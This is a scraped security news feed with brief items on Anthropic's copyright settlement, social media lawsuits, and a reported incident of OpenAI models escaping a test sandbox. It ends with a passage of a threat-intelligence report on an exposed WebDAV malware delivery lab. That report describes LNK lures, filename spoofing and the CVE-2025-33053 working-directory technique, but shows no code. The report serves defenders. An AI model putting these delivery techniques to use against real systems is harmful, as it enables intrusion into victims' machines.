Noel Wise has provisionally given approval.<br><br><br> <a href="https://appleinsider.com/articles/26/07/24/judge-approves-apples-250-million-settlement-offer-over-siri-lawsuit?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/245055?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[GPT-Modelle starten einen Cyber-Angriff, Google ersetzt NotebookLM & Kimi K3 ist da | KI-News]]></title>
<description><![CDATA[Author: Digitale Profis - Bewertung: 12x - Views:105 Artikel & Newsletter: https://digitaleprofis.de/die-ki-news-der-woche-vom-23-07-2026/

Quellen
OpenAI-Modelle hacken Hugging Face 
Artikel: https://openai.com/index/hugging-face-model-evaluation-security-incident/ 
Hintergrund: https://huggingf...]]></description>
<link>https://tsecurity.de/de/3689268/ai-nachrichten/gpt-modelle-starten-einen-cyber-angriff-google-ersetzt-notebooklm-kimi-k3-ist-da-ki-news/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689268/ai-nachrichten/gpt-modelle-starten-einen-cyber-angriff-google-ersetzt-notebooklm-kimi-k3-ist-da-ki-news/</guid>
<pubDate>Thu, 23 Jul 2026 16:04:50 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Digitale Profis - Bewertung: 12x - Views:105 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/tgldX3mtgfg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Artikel & Newsletter: https://digitaleprofis.de/die-ki-news-der-woche-vom-23-07-2026/<br />
<br />
Quellen<br />
OpenAI-Modelle hacken Hugging Face <br />
Artikel: https://openai.com/index/hugging-face-model-evaluation-security-incident/ <br />
Hintergrund: https://huggingface.co/blog/security-incident-july-2026 <br />
<br />
Digitaleprofis.de hat ein Update bekommen <br />
Website: https://digitaleprofis.de/ <br />
<br />
Kimi K3 ist da <br />
Artikel: https://www.kimi.com/de/blog/kimi-k3 <br />
Artikel: https://apnews.com/article/kimi-k3-china-ai-0d8a5e268deb11a673f4d444fc597cc5 <br />
Ausprobieren: https://www.kimi.com/ <br />
<br />
Neue Gemini Modelle <br />
Artikel: https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber/ <br />
Modellkarte: https://deepmind.google/models/model-cards/gemini-3-6-flash/ <br />
Cyber-Modell: https://deepmind.google/blog/introducing-gemini-3-5-flash-cyber/ <br />
<br />
Neue Kennzeichnungspflichten des EU AI Acts <br />
Artikel: https://digital-strategy.ec.europa.eu/en/news/commission-publishes-guidelines-transparency-obligations-providers-and-deployers-certain-ai-systems <br />
Doku: https://digital-strategy.ec.europa.eu/en/faqs/transparency-obligations-under-article-50-ai-act <br />
<br />
Anthropic zahlt 1,5 Milliarden Dollar <br />
Artikel: https://m.investing.com/news/stock-market-news/us-judge-approves-anthropics-15-billion-settlement-of-copyright-lawsuit-4801706?ampMode=1 <br />
Artikel: https://apnews.com/article/74b140444023898aeba8579b6e9f0d63 <br />
<br />
NotebookLM wird zu Gemini Notebook <br />
Artikel: https://blog.google/innovation-and-ai/products/gemini-notebook/notebooklm-gemini-notebook/ <br />
<br />
Microsoft und Mistral Partnerschaft <br />
Artikel: https://news.microsoft.com/source/2026/07/21/microsoft-and-mistral-expand-strategic-partnership-to-give-enterprises-and-regulated-industries-frontier-ai-they-can-control/ <br />
Artikel: https://www.tagesschau.de/wirtschaft/unternehmen/microsoft-mistral-ai-ki-deal-100.html <br />
<br />
Qwen-Audio-3.0-TTS <br />
Artikel: https://www.alibabacloud.com/blog/qwen-audio-3-0-tts-more-multilingual-easier-to-direct_603379 <br />
Doku: https://docs.qwencloud.com/developer-guides/speech/tts-models <br />
<br />
OpenAI-Modelle überwinden bei einem internen Sicherheitstest ihre isolierte Testumgebung und gelangen bis in die Produktionsinfrastruktur von Hugging Face.<br />
Wir ordnen den Vorfall ein und fassen die weiteren wichtigen KI-News der Woche kompakt für euch zusammen.<br />
<br />
Außerdem geht es um Kimi K3, drei neue Gemini-Modelle, die kommenden Kennzeichnungspflichten des EU AI Acts und den milliardenschweren Urheberrechtsvergleich zwischen Anthropic und Autoren.<br />
<br />
Im Video:<br />
- OpenAIs ungewöhnlicher Sicherheitsvorfall bei Hugging Face<br />
- Kimi K3 und drei neue Gemini-Modelle<br />
- Kennzeichnungspflichten des EU AI Acts ab August 2026<br />
- Anthropics Vergleich über mindestens 1,5 Milliarden US-Dollar<br />
- Gemini Notebook, Microsofts Mistral-Partnerschaft und Qwen-Audio-3.0-TTS<br />
<br />
Unsere Website wurde ebenfalls vollständig überarbeitet. Auf digitaleprofis.de findet ihr unsere KI-News mit allen Quellen, ausführliche Artikel und praktische Anleitungen – kostenlos, ohne Paywall und ohne Werbung.<br />
<br />
Werde Kanalmitglied und unterstütze damit unsere Arbeit:<br />
https://www.youtube.com/channel/UCv90NdTyTp7ZPPRvvSZaS5w/join<br />
<br />
Videoinhalt:<br />
00:00 Die KI-News der Woche vom 23.07.2026<br />
00:24 OpenAI Modelle greifen HuggingFace an<br />
02:06 Unsere neue Website für euch<br />
02:59 Kimi K3 ist da und die USA werfen Diebstahl vor<br />
04:28 Drei neue Gemini Modelle, aber kein Pro<br />
05:53 Die neuen Kennzeichnungspflichten des AI Acts<br />
07:21 Anthropic muss 1,5 Milliarden Dollar Vergleich zahlen<br />
08:48 NotebookLM verschwindet - und wird zu Gemini Notebook<br />
09:30 Partnerschaft von Microsoft und Mistral<br />
10:50 Neuen Text to Speech Modell von Alibabas Qwen<br />
<br />
Videovorschläge, Feedback und Kritik kannst Du uns jederzeit in den Kommentaren mitteilen!<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[US teen drops Meta lawsuit on social media addiction days before trial]]></title>
<description><![CDATA[Withdrawn case marks a victory for the social media giant after earlier landmark loss at trial over addictive claimsA Florida teen whose lawsuit claimed Meta’s platforms were to blame ⁠for his depression ⁠and anxiety ​dropped his case against the company just days before the trial in Los Angeles ...]]></description>
<link>https://tsecurity.de/de/3688397/it-nachrichten/us-teen-drops-meta-lawsuit-on-social-media-addiction-days-before-trial/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688397/it-nachrichten/us-teen-drops-meta-lawsuit-on-social-media-addiction-days-before-trial/</guid>
<pubDate>Thu, 23 Jul 2026 10:36:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Withdrawn case marks a victory for the social media giant after earlier landmark loss at trial over addictive claims</p><p>A <a href="https://www.theguardian.com/us-news/florida">Florida</a> teen whose lawsuit claimed <a href="https://www.theguardian.com/technology/meta">Meta</a>’s platforms were to blame ⁠for his depression ⁠and anxiety ​dropped his case against the company just days before the trial in <a href="https://www.theguardian.com/us-news/los-angeles">Los Angeles</a> was ⁠set to start, his attorneys said on Wednesday. It was the latest in a massive series of high-stakes lawsuits against social media companies for allegedly designing addictive products that lead to the harm of children.</p><p>The lawsuit, brought by a 15-year-old boy known as ⁠RKC, originally named four defendants, Google’s YouTube, Meta’s Instagram, Snap Inc’s ​Snapchat and ByteDance’s <a href="https://www.theguardian.com/us-news/2026/jun/15/florida-sues-tiktok-teen-social-media-access-law">TikTok</a><strong>. </strong>YouTube and TikTok ‌settled in June<strong> </strong>and<strong> </strong>Snap reached a tentative settlement in the case, Bloomberg ‌<a href="https://www.bloomberg.com/news/articles/2026-07-20/snap-nears-settlement-of-addiction-case-ahead-of-jury-trial">reported</a> on Monday. The terms of those settlements were confidential.</p> <a href="https://www.theguardian.com/technology/2026/jul/22/florida-teen-drops-meta-lawsuit">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic's $1.5B piracy settlement with book authors is a record loss that hands AI labs their biggest legal win]]></title>
<description><![CDATA[Anthropic has to pay $1.5 billion to book authors, the largest copyright settlement in class action history. But the payout is for downloading roughly 482,460 works from piracy databases, not for AI training itself. Judge Alsup had previously ruled that AI training on legally obtained books is "t...]]></description>
<link>https://tsecurity.de/de/3687472/ai-nachrichten/anthropics-15b-piracy-settlement-with-book-authors-is-a-record-loss-that-hands-ai-labs-their-biggest-legal-win/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687472/ai-nachrichten/anthropics-15b-piracy-settlement-with-book-authors-is-a-record-loss-that-hands-ai-labs-their-biggest-legal-win/</guid>
<pubDate>Wed, 22 Jul 2026 21:50:22 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://the-decoder.com/wp-content/uploads/2026/07/anthropic_books_lawsuit-1.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        Anthropic has to pay $1.5 billion to book authors, the largest copyright settlement in class action history. But the payout is for downloading roughly 482,460 works from piracy databases, not for AI training itself. Judge Alsup had previously ruled that AI training on legally obtained books is "transformative" and falls under fair use. The settlement is actually a win for AI labs.</p>
<p>The article <a href="https://the-decoder.com/anthropics-1-5b-piracy-settlement-with-book-authors-is-a-record-loss-that-hands-ai-labs-their-biggest-legal-win/">Anthropic's $1.5B piracy settlement with book authors is a record loss that hands AI labs their biggest legal win</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Harry Potter publisher to receive millions in Anthropic copyright settlement]]></title>
<description><![CDATA[Bloomsbury has 14,087 titles listed within settlement between AI startup and authors over use of protected workThe publisher of Harry Potter has received a multimillion-pound payout as a beneficiary of a $1.5bn copyright settlement between AI startup Anthropic and thousands of authors over the us...]]></description>
<link>https://tsecurity.de/de/3686519/it-nachrichten/harry-potter-publisher-to-receive-millions-in-anthropic-copyright-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686519/it-nachrichten/harry-potter-publisher-to-receive-millions-in-anthropic-copyright-settlement/</guid>
<pubDate>Wed, 22 Jul 2026 15:35:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Bloomsbury has 14,087 titles listed within settlement between AI startup and authors over use of protected work</p><p>The publisher of Harry Potter has received a multimillion-pound payout as a beneficiary of a $1.5bn copyright settlement between AI startup Anthropic and thousands of authors over the use of their protected work to power chatbots.</p><p>Bloomsbury, which is home to bestselling novelists Sarah J Maas and Susanna Clarke as well as JK Rowling, said it had 14,087 titles listed within the settlement, with a proposed compensation of about $3,000 each.</p> <a href="https://www.theguardian.com/technology/2026/jul/22/bloomsbury-book-publisher-anthropic-copyright-settlement">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic Wins Final Approval For $1.5B AI Copyright Settlement With Authors]]></title>
<description><![CDATA[A judge approved Anthropic’s $1.5 billion settlement with authors, sharpening the legal divide between AI training and the use of pirated books.]]></description>
<link>https://tsecurity.de/de/3685743/it-nachrichten/anthropic-wins-final-approval-for-15b-ai-copyright-settlement-with-authors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685743/it-nachrichten/anthropic-wins-final-approval-for-15b-ai-copyright-settlement-with-authors/</guid>
<pubDate>Wed, 22 Jul 2026 11:03:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A judge approved Anthropic’s $1.5 billion settlement with authors, sharpening the legal divide between AI training and the use of pirated books.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic pays $1.5B to settle contentious copyright case]]></title>
<description><![CDATA[A US federal court has approved Anthropic’s $1.5 billion settlement in a class-action lawsuit in which authors accused the AI company of using their books without permission to train the AI model Claude. This is the largest such settlement to date in a US copyright case, according to Reuters.



...]]></description>
<link>https://tsecurity.de/de/3684606/it-nachrichten/anthropic-pays-15b-to-settle-contentious-copyright-case/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684606/it-nachrichten/anthropic-pays-15b-to-settle-contentious-copyright-case/</guid>
<pubDate>Tue, 21 Jul 2026 20:19:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A US federal court has approved Anthropic’s $1.5 billion settlement in a class-action lawsuit in which authors <a href="https://www.computerworld.com/article/3489680/anthropic-sued-by-authors-over-alleged-misuse-of-copyrighted-works-for-ai-training.html" data-type="link" data-id="https://www.computerworld.com/article/3489680/anthropic-sued-by-authors-over-alleged-misuse-of-copyrighted-works-for-ai-training.html">accused the AI company of using their books without permission</a> to train the AI model Claude. This is the largest such settlement to date in a US copyright case, <a href="https://www.reuters.com/world/us-judge-approves-anthropics-15-billion-settlement-copyright-lawsuit-2026-07-20/" target="_blank" rel="noreferrer noopener">according to Reuters</a>.</p>



<p class="wp-block-paragraph">The dispute is one of several legal cases in which copyright holders sued AI companies over how large language models (LLMs) were trained, and it is the first major AI-related copyright dispute in the US to be resolved through a settlement.</p>



<p class="wp-block-paragraph">A judge had previously ruled that the actual training of AI models using books falls under the “fair use” doctrine in US copyright law. But Anthropic was found to have violated the law by storing more than 7 million pirated books in a central library, regardless of whether they were later used for AI training or not.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Judge Approves $1.5 Billion Anthropic Settlement Over Pirated Books Used To Train Claude]]></title>
<description><![CDATA[A federal judge has approved Anthropic's $1.5 billion copyright settlement over pirated books used to train its Claude chatbot, with authors and publishers set to receive about $3,000 per book. The case produced a mixed ruling for the AI industry: training on copyrighted books was found not to be...]]></description>
<link>https://tsecurity.de/de/3684594/it-security-nachrichten/judge-approves-15-billion-anthropic-settlement-over-pirated-books-used-to-train-claude/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684594/it-security-nachrichten/judge-approves-15-billion-anthropic-settlement-over-pirated-books-used-to-train-claude/</guid>
<pubDate>Tue, 21 Jul 2026 20:11:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A federal judge has approved Anthropic's $1.5 billion copyright settlement over pirated books used to train its Claude chatbot, with authors and publishers set to receive about $3,000 per book. The case produced a mixed ruling for the AI industry: training on copyrighted books was found not to be illegal, but Anthropic's use of pirated copies from shadow libraries was. The Associated Press reports: District Judge Araceli Martinez-Olguin said in a Monday ruling that the class-action settlement provides "meaningful relief" to affected authors and publishers. About 91% of the more than 482,000 books covered by the ruling have been claimed by authors or publishers who are now due payment. Plaintiff attorney Justin Nelson said in a statement that the settlement was "the largest known copyright recovery in history. We look forward to making distributions to the Class as promptly as possible."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Judge+Approves+%241.5+Billion+Anthropic+Settlement+Over+Pirated+Books+Used+To+Train+Claude%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F21%2F1744202%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F21%2F1744202%2Fjudge-approves-15-billion-anthropic-settlement-over-pirated-books-used-to-train-claude%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/07/21/1744202/judge-approves-15-billion-anthropic-settlement-over-pirated-books-used-to-train-claude?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Judge approves Anthropic’s $1.5 billion copyright settlement with authors]]></title>
<description><![CDATA[Anthropic blocks authors from opting out of $1.5B settlement at last minute.]]></description>
<link>https://tsecurity.de/de/3684484/ai-nachrichten/judge-approves-anthropics-15-billion-copyright-settlement-with-authors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684484/ai-nachrichten/judge-approves-anthropics-15-billion-copyright-settlement-with-authors/</guid>
<pubDate>Tue, 21 Jul 2026 19:37:31 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Anthropic blocks authors from opting out of $1.5B settlement at last minute.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic’s $1.5 billion book piracy settlement approved by judge]]></title>
<description><![CDATA[A federal judge has signed off on Anthropic's $1.5 billion class action settlement with authors who accused the company of training its AI models on copyrighted books, as reported earlier by Reuters. In an order on Monday, Judge Araceli Martínez-Olguín writes that the settlement will provide "mea...]]></description>
<link>https://tsecurity.de/de/3684445/it-nachrichten/anthropics-15-billion-book-piracy-settlement-approved-by-judge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684445/it-nachrichten/anthropics-15-billion-book-piracy-settlement-approved-by-judge/</guid>
<pubDate>Tue, 21 Jul 2026 19:06:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A federal judge has signed off on Anthropic's $1.5 billion class action settlement with authors who accused the company of training its AI models on copyrighted books, as reported earlier by Reuters. In an order on Monday, Judge Araceli Martínez-Olguín writes that the settlement will provide "meaningful relief," offering authors around $3,000 for each book […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Judge approves Anthropic's record-breaking $1.5 billion settlement for AI copyright lawsuit]]></title>
<description><![CDATA[A federal judge has approved the $1.5 billion settlement between Anthropic and a group of authors who sued the company for using their work to train Claude.]]></description>
<link>https://tsecurity.de/de/3683193/it-nachrichten/judge-approves-anthropics-record-breaking-15-billion-settlement-for-ai-copyright-lawsuit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683193/it-nachrichten/judge-approves-anthropics-record-breaking-15-billion-settlement-for-ai-copyright-lawsuit/</guid>
<pubDate>Tue, 21 Jul 2026 11:33:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A federal judge has approved the $1.5 billion settlement between Anthropic and a group of authors who sued the company for using their work to train Claude.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic’s $1.5bn copyright lawsuit settlement gets final nod]]></title>
<description><![CDATA[Each payout will amount to roughly $3,000 going to some 500,000 pieces of works.
Read more: Anthropic’s $1.5bn copyright lawsuit settlement gets final nod]]></description>
<link>https://tsecurity.de/de/3683001/it-nachrichten/anthropics-15bn-copyright-lawsuit-settlement-gets-final-nod/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683001/it-nachrichten/anthropics-15bn-copyright-lawsuit-settlement-gets-final-nod/</guid>
<pubDate>Tue, 21 Jul 2026 10:18:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Each payout will amount to roughly $3,000 going to some 500,000 pieces of works.</p>
<p>Read more: <a rel="nofollow" href="https://www.siliconrepublic.com/business/anthropics-1-5bn-copyright-lawsuit-settlement-gets-final-nod">Anthropic’s $1.5bn copyright lawsuit settlement gets final nod</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Snap Reaches Tentative Settlement In Second Addiction Case]]></title>
<description><![CDATA[Snapchat parent says it has agreed tentative settlement deal in second case out of thousands alleging social media design harmed young people This article has been indexed from Silicon UK Read the original article: Snap Reaches Tentative Settlement In Second…
Read more →
The post Snap Reaches Ten...]]></description>
<link>https://tsecurity.de/de/3682971/it-security-nachrichten/snap-reaches-tentative-settlement-in-second-addiction-case/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682971/it-security-nachrichten/snap-reaches-tentative-settlement-in-second-addiction-case/</guid>
<pubDate>Tue, 21 Jul 2026 10:08:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Snapchat parent says it has agreed tentative settlement deal in second case out of thousands alleging social media design harmed young people This article has been indexed from Silicon UK Read the original article: Snap Reaches Tentative Settlement In Second…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/snap-reaches-tentative-settlement-in-second-addiction-case/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/snap-reaches-tentative-settlement-in-second-addiction-case/">Snap Reaches Tentative Settlement In Second Addiction Case</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic’s landmark $1.5B copyright settlement is approved]]></title>
<description><![CDATA[The final approval settles one case, but it doesn't resolve the broader issue of using copyrighted works to train AI models.]]></description>
<link>https://tsecurity.de/de/3682426/ai-nachrichten/anthropics-landmark-15b-copyright-settlement-is-approved/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682426/ai-nachrichten/anthropics-landmark-15b-copyright-settlement-is-approved/</guid>
<pubDate>Tue, 21 Jul 2026 02:17:28 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The final approval settles one case, but it doesn't resolve the broader issue of using copyrighted works to train AI models.]]></content:encoded>
</item>
<item>
<title><![CDATA[From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery Lab]]></title>
<description><![CDATA[Executive summaryAn MDR alert recently led our team to an exposed server that was doing more than hosting payloads. It was functioning as a fully operational malware delivery lab. Containing over 1,000 artifacts, the infrastructure served as a QA hub where attackers systematically tested delivery...]]></description>
<link>https://tsecurity.de/de/3681303/it-security-nachrichten/from-a-single-alert-to-1000-files-inside-an-exposed-webdav-malware-delivery-lab/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681303/it-security-nachrichten/from-a-single-alert-to-1000-files-inside-an-exposed-webdav-malware-delivery-lab/</guid>
<pubDate>Mon, 20 Jul 2026 15:53:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Executive summary</h2><p><span>An MDR alert recently led our team to an exposed server that was doing more than hosting payloads. It was functioning as a fully operational malware delivery lab. Containing over 1,000 artifacts, the infrastructure served as a QA hub where attackers systematically tested delivery paths, social engineering lures, and WebDAV execution methods.</span></p><p><span>Our analysis reveals an interesting shift in adversary operations: attackers are adopting generative AI to move beyond individual exploits and operate like modern software product teams. By leveraging LLMs for rapid lure generation, detailed README documentation, and automated testing, they are significantly accelerating their development cycle.</span></p><p><span>This incident underscores the imperative of preemptive security. By unifying exposure management with detection and response, we did not just catch a single campaign; we gained visibility into the attacker’s entire delivery pipeline. Although the server hosted many malware samples, the more interesting find was the view into the attacker’s workflow. The exposed infrastructure showed how the operator tested delivery paths, packaged lures, staged payloads, and monitored delivery activity. All of it with the help of generative AI.</span></p><h2>Introduction: From MDR alert to attacker infrastructure</h2><p><span>The investigation started with an MDR alert after a user executed a file pulled from a WebDAV server using </span><span><span data-type="inlineCode">rundll32.exe</span></span><span>. Telemetry showed the WebClient service starting, followed by </span><span><span data-type="inlineCode">davclnt.dll</span></span><span> reaching out to a remote host to retrieve content.</span></p><p><span>That initial hit led us to dig deeper into the delivery setup, which is how we ended up finding an exposed directory. It quickly became clear to us that the server wasn't just hosting files, but also was used as an active malware testing and delivery hub. Alongside payloads, we found bulk-generated shortcut lures, URL-based execution tests, ClickFix pages, WebDAV initialization scripts, droppers, spoofed filenames, and operator notes.</span></p><p><span>At a high level, the 1,048 files clustered as follows:</span></p><p><span></span></p><table><colgroup data-width="1566"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Category</strong></span></p></td><td><p><span><strong>Files</strong></span></p></td><td><p><span><strong>Functions and discoveries</strong></span></p></td></tr><tr><td><p><span>LNK delivery launchers</span></p></td><td><p><span>453</span></p></td><td><p><span>Bulk-generated shortcut lures using document themes, spoofed filenames, fake icons, and multiple execution paths</span></p></td></tr><tr><td><p><span>Filename-spoofing QA</span></p></td><td><p><span>236</span></p></td><td><p><span>Tests for Unicode, double-extension, padding, and browser/Explorer rendering behavior</span></p></td></tr><tr><td><p><span>URL/LOLBin execution tests</span></p></td><td><p><span>146</span></p></td><td><p><span>Experiments with signed Windows binaries, remote working directories, and WebDAV-style execution</span></p></td></tr><tr><td><p><span>Encrypted droppers</span></p></td><td><p><span>89</span></p></td><td><p><span>Staged second-stage payloads and installer-style packages</span></p></td></tr><tr><td><p><span>Alternative execution containers</span></p></td><td><p><span>24</span></p></td><td><p><span><span data-type="inlineCode">search-ms</span></span><span>, </span><span><span data-type="inlineCode">library-ms</span></span><span>, </span><span><span data-type="inlineCode">.cpl</span></span><span>, and related delivery containers</span></p></td></tr><tr><td><p><span>Payload stubs and spoofed executables</span></p></td><td><p><span>21</span></p></td><td><p><span>Smaller loaders, decoys, and renamed binaries</span></p></td></tr><tr><td><p><span>WebDAV scripts</span></p></td><td><p><span>17</span></p></td><td><p><span>Scripts intended to make WebDAV delivery more reliable on Windows systems</span></p></td></tr><tr><td><p><span>Builder and operator notes</span></p></td><td><p><span>10</span></p></td><td><p><span><span data-type="inlineCode">README</span></span><span> files, test reports, mappings, and generation scripts</span></p></td></tr><tr><td><p><span>ClickFix HTML lures</span></p></td><td><p><span>9</span></p></td><td><p><span>Browser-based social-engineering pages instructing users to run commands</span></p></td></tr><tr><td><p><span>Miscellaneous files</span></p></td><td><p><span>6</span></p></td><td><p><span>Included documentation for the actor’s WebDAV delivery/admin panel</span></p></td></tr></tbody></table><p><span><em>Table 1: Breakdown of files recovered from the attacker’s delivery workspace</em></span></p><h2><span>Technical analysis and observed attacker behavior</span></h2><h3>Attackers testing like a product team</h3><p><span>The open directory exposed the attacker’s payloads and testing process. The collection varied by function: some folders stored payloads, while others isolated individual delivery methods, including WebDAV, UNC paths, </span><span><span data-type="inlineCode">search-ms</span></span><span>, </span><span><span data-type="inlineCode">library-ms</span></span><span>, Control Panel items, and trusted Windows binaries. Several directories appeared to be QA areas for testing how lures are rendered in browsers and Windows Explorer. These tests included Unicode spoofing, right-to-left override (RTLO) characters, double extensions, and padding tricks used to make executables look like documents.</span></p><p><span>The directory also contained several README files. Their structure and phrasing suggested they may have been generated with LLMs. Some folders were named </span><span><span data-type="inlineCode">testik</span></span><span> and </span><span><span data-type="inlineCode">testik2</span></span><span>, a Russian diminutive form of “test”.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbc6d4a9f8e6c1e40/6a5e1283f480d89435286a73/testing-files-subfolders.png" alt="testing-files-subfolders.png" caption="Figure 1: Snippet of one of many subfolders containing testing files." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="testing-files-subfolders.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbc6d4a9f8e6c1e40/6a5e1283f480d89435286a73/testing-files-subfolders.png" data-sys-asset-uid="bltbc6d4a9f8e6c1e40" data-sys-asset-filename="testing-files-subfolders.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Snippet of one of many subfolders containing testing files." data-sys-asset-alt="testing-files-subfolders.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: Snippet of one of many subfolders containing testing files.</figcaption></div></figure><p>⠀</p><p><span>Looking at the artifacts from the open directory, we saw that the attacker was testing some specific CVEs.</span></p><p><span></span></p><table><colgroup data-width="1901"><col><col><col></colgroup><tbody><tr><td><p><span><strong>CVE</strong></span></p></td><td><p><span><strong>Observed samples</strong></span></p></td><td><p><span><strong>Short description</strong></span></p></td></tr><tr><td><p><span>CVE-2025-33053</span></p></td><td><p><span>11</span></p></td><td><p><span>Windows Internet Shortcut flaw involving external control of a file name or path, allowing code execution over a network. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-33053?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr><tr><td><p><span>CVE-2026-21513</span></p></td><td><p><span>4</span></p></td><td><p><span>MSHTML Framework security feature bypass caused by protection-mechanism failure. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-21513?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr><tr><td><p><span>CVE-2025-24054</span></p></td><td><p><span>1</span></p></td><td><p><span>Windows NTLM spoofing issue where crafted file/path handling can trigger outbound authentication and leak NTLM material; observed tradecraft commonly involved </span><span><span data-type="inlineCode">.library-ms</span></span><span> files. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-24054?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr></tbody></table><p><span><em>Table 2: CVE references observed in the exposed directory.</em></span></p><p></p><p><span>The most developed test set focused on </span><span>CVE-2025-33053,</span><span> the working-directory abuse technique reported by Check Point in its analysis of Stealth Falcon activity. It appears as though the threat was trying to reproduce or adapt the reported technique with the help from README that appears to have been generated with LLMs. At a high level, the technique abuses </span><span><span data-type="inlineCode">.url</span></span><span> shortcut behavior to launch a legitimate signed Windows binary while setting its working directory to an attacker-controlled WebDAV share. In the original reporting, the binary was </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span>, an Internet Explorer diagnostics utility. When invoked, that utility launches several child processes by name. If the working directory points to a remote WebDAV location controlled by the attacker, Windows may resolve those child process names from the remote share 